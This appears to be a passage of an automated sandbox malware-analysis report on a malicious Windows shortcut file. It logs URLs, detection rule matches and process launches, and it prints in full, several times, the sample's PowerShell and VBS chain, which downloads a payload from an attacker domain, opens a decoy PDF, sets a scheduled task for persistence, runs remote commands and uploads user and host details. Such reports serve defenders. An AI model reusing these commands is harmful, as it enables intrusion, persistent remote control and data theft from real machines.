              Source: svchost.exe, 0000000E.00000003.1353549281.000001FC96190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000010.00000002.2303633437.000002178DD0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1318527100.00000219E0715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178E70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22AC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0056E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1334636017.00000219EFB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1334636017.00000219EFC93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DB56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2352737151.000002179DC99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
              Source: powershell.exe, 0000001B.00000002.2661463505.000001E22A735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD0008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.sh
              Source: powershell.exe, 00000001.00000002.1318527100.00000219E1127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1318527100.00000219E1115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F1AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303633437.000002178F0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop
              Source: powershell.exe, 0000001B.00000002.2661463505.000001E22AB6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/va
              Source: powershell.exe, 0000001B.00000002.2661463505.000001E22B40C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2661463505.000001E22B1F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/val
              Source: powershell.exe, 00000001.00000002.1318527100.00000219E1192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/value
              Source: powershell.exe, 00000020.00000002.3768594875.000001BD75680000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.1.drString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/
              Source: powershell.exe, 00000010.00000002.2303633437.000002178F0D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/4602718593.txt
              Source: powershell.exe, 0000001B.00000002.2661463505.000001E22B182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/82980464243822115700/refresh81/4869132.txt
              Source: powershell.exe, 00000020.00000002.3768594875.000001BD75680000.00000004.00000020.00020000.00000000.sdmp, Libraries.vbs.1.drString found in binary or memory: https://onedriveview.shop/api/values/refresh81
              Source: powershell.exe, 0000001B.00000002.2661463505.000001E22AB6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/refresh81X
              Source: powershell.exe, 00000020.00000002.3733520219.000001BD004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedriveview.shop/api/values/refresh81tesesX
              Source: powershell.exe, 00000001.00000002.1318221061.00000219DDCC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1318527100.00000219DFD15000.00000004.00000800.00020000.00000000.sdmp, XnQmVRj5g0.lnkString found in binary or memory: https://onedriveview.shop/api/values/view/sklyar.txt
              Source: ReaderMessages.9.drString found in binary or memory: https://www.adobe.co

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_5904.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Windows shortcut file (LNK) contains suspicious command line arguments
              Source: XnQmVRj5g0.lnkLNK file: -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC5A0EE016_2_00007FFAAC5A0EE0
              Source: amsi64_5904.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winLNK@32/53@0/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Libraries\Libraries.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bitvsf13.5sq.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: XnQmVRj5g0.lnkReversingLabs: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
